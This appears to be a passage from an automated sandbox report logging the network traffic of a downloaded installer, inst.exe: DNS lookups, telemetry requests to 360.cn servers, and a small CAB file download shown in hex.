                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.154107094 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.261600971 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.261771917 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.375332117 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.375364065 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.480479956 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.480568886 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.487179041 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.590089083 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.590496063 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.596554041 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.699251890 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.699251890 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.702655077 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.809636116 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.809648991 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.922061920 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.922091961 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.027961969 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.027990103 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.030725956 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.136550903 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.136580944 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.145785093 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.245975971 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.246098995 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.355298996 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.355355024 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.464693069 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.464756012 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.471653938 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.574318886 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.574383020 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.575938940 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.683482885 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.683710098 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.792989969 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.793147087 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.901061058 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:41.902097940 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:42.011533976 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:42.011678934 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:42.013633966 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:42.120944977 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:42.345302105 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:42.454354048 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:42.560606956 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:44.199219942 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:47.919869900 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:48.472918034 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:48.576180935 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:48.576211929 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:51.746021986 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:53.825903893 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:55.902479887 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.453928947 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.575623989 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.575747967 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.782715082 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:20:00.277561903 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:20:03.011677027 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:20:06.626457930 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:20:10.344070911 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:20:12.418998957 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:20:16.574600935 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:20:17.123100996 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:17.231530905 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.359725952 CET192.168.2.71.192.136.1714a69(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Dec 29, 2024 11:18:14.794842958 CET192.168.2.71.1.1.10xd33fStandard query (0)bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.285932064 CET192.168.2.71.1.1.10x60a3Standard query (0)s.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.708944082 CET192.168.2.71.1.1.10xa3e3Standard query (0)st.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.823026896 CET192.168.2.71.1.1.10x12d1Standard query (0)tr.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.825977087 CET192.168.2.71.1.1.10x9c05Standard query (0)agt.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.461070061 CET192.168.2.71.1.1.10xf8deStandard query (0)agd.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.464617014 CET192.168.2.71.1.1.10x6c13Standard query (0)pinst.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.464500904 CET192.168.2.71.1.1.10x6c13Standard query (0)pinst.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.085813046 CET1.1.1.1192.168.2.70xd33fNo error (0)bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com47.79.48.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.423779011 CET1.1.1.1192.168.2.70x60a3No error (0)s.360.cn171.8.167.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.423779011 CET1.1.1.1192.168.2.70x60a3No error (0)s.360.cn171.13.14.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.423779011 CET1.1.1.1192.168.2.70x60a3No error (0)s.360.cn180.163.251.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.423779011 CET1.1.1.1192.168.2.70x60a3No error (0)s.360.cn171.8.167.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.960895061 CET1.1.1.1192.168.2.70x12d1No error (0)tr.p.360.cn1.192.136.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.960895061 CET1.1.1.1192.168.2.70x12d1No error (0)tr.p.360.cn1.192.136.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.960895061 CET1.1.1.1192.168.2.70x12d1No error (0)tr.p.360.cn1.192.136.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.960895061 CET1.1.1.1192.168.2.70x12d1No error (0)tr.p.360.cn1.192.136.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.964226961 CET1.1.1.1192.168.2.70x9c05No error (0)agt.p.360.cn1.192.136.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.964226961 CET1.1.1.1192.168.2.70x9c05No error (0)agt.p.360.cn1.192.136.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.252985954 CET1.1.1.1192.168.2.70xa3e3No error (0)st.p.360.cn1.192.136.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.147690058 CET1.1.1.1192.168.2.70xf8deNo error (0)agd.p.360.cnagd2.p.360.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.147690058 CET1.1.1.1192.168.2.70xf8deNo error (0)agd2.p.360.cn1.192.194.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.147690058 CET1.1.1.1192.168.2.70xf8deNo error (0)agd2.p.360.cn1.192.194.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874721050 CET1.1.1.1192.168.2.70x6c13No error (0)pinst.360.cnsoftm.update.360safe.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874721050 CET1.1.1.1192.168.2.70x6c13No error (0)softm.update.360safe.comseupdate.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874721050 CET1.1.1.1192.168.2.70x6c13No error (0)seupdate.360qhcdn.com39.156.85.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874721050 CET1.1.1.1192.168.2.70x6c13No error (0)seupdate.360qhcdn.com39.156.85.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874721050 CET1.1.1.1192.168.2.70x6c13No error (0)seupdate.360qhcdn.com39.156.85.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874813080 CET1.1.1.1192.168.2.70x6c13No error (0)pinst.360.cnsoftm.update.360safe.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874813080 CET1.1.1.1192.168.2.70x6c13No error (0)softm.update.360safe.comseupdate.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874813080 CET1.1.1.1192.168.2.70x6c13No error (0)seupdate.360qhcdn.com39.156.85.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874813080 CET1.1.1.1192.168.2.70x6c13No error (0)seupdate.360qhcdn.com39.156.85.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874813080 CET1.1.1.1192.168.2.70x6c13No error (0)seupdate.360qhcdn.com39.156.85.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    • bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                                                                                                                                                                                    • s.360.cn
                                                                                                                                                                                                                    • pinst.360.cn
                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.749738171.8.167.90801464C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.603414059 CET398OUTGET /safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.175178051 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:31 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.320899010 CET428OUTGET /safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.886421919 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:33 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.888859034 CET385OUTGET /safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.440874100 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:34 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.443403006 CET398OUTGET /safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.006236076 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:34 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.011354923 CET398OUTGET /safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.568841934 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:35 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.569289923 CET235OUTGET /safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Dec 29, 2024 11:18:36.120131969 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:35 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:38.581141949 CET385OUTGET /safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.146619081 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:38 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.183748007 CET239OUTGET /safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.747613907 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:39 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.749748171.8.167.90801464C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.682585955 CET384OUTGET /safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.286823034 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:35 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.288252115 CET384OUTGET /safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.850770950 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:35 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:38.584850073 CET398OUTGET /safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.654844999 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:39 GMT
                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    ETag: "5d36b901-0"
                                                                                                                                                                                                                    Accept-Ranges: bytes


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.74975639.156.85.200801464C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.998892069 CET202OUTGET /360safe/h_inst.cab?rd=10788264 HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                                                                                                                                                                                                                    Host: pinst.360.cn
                                                                                                                                                                                                                    Connection: Close
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.610970974 CET228INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.2.6.10
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:37 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 648
                                                                                                                                                                                                                    Last-Modified: Fri, 27 Dec 2024 02:49:32 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.611284971 CET648INData Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51
                                                                                                                                                                                                                    Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+W


